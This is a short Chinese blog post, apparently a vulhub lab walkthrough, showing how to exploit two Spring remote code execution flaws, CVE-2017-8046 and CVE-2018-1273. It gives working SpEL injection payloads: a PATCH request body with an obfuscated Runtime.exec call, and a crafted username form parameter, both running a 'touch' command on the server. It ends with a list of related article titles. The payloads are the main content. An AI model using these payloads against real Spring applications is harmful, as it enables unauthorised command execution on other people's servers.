常见框架漏洞--Spring

ksk8522025-03-25 9:05

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

环境搭建

漏洞利用

1. 访问 http://your-ip:8080/customers/1

2.然后抓取数据包,使⽤PATCH请求来修改

{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" ,"value": "vulhub" }


其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11 5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

查看是否上传成功

spring 代码执⾏ (CVE-2018-1273)

搭建环境后访问

访问users

填写注册信息,抓包

在username后加
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/sss")]=&password=&repeatedPassword=

进入终端查看

相关推荐
浩浩测试一下7 小时前
内网---> WriteOwner权限滥用
网络·汇编·windows·安全·microsoft·系统安全
Loo国昌8 小时前
【大模型应用开发】第六阶段:模型安全与可解释性
人工智能·深度学习·安全·transformer
乾元8 小时前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构
安科瑞刘鸿鹏178 小时前
高速路灯故障难定位?用 ASL600 实现精确单灯监测与维护预警
运维·网络·物联网·安全
darkb1rd18 小时前
四、PHP文件包含漏洞深度解析
网络·安全·php
哆啦code梦18 小时前
2024 OWASP十大安全威胁解析
安全·系统安全·owasp top 10
网络安全研究所20 小时前
AI安全提示词注入攻击如何操控你的智能助手?
人工智能·安全
海心焱20 小时前
安全之盾:深度解析 MCP 如何缝合企业级 SSO 身份验证体系,构建可信 AI 数据通道
人工智能·安全
程序员哈基耄1 天前
纯客户端隐私工具集:在浏览器中守护你的数字安全
安全
darkb1rd1 天前
五、PHP类型转换与类型安全
android·安全·php
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03使用 1panel面板 部署 php网站04OpenClaw Chrome扩展使用教程 - 浏览器中继控制05Linux下V2Ray安装配置指南06Vue-skills的中文文档07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09Claude Code Skills 实用使用手册10一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示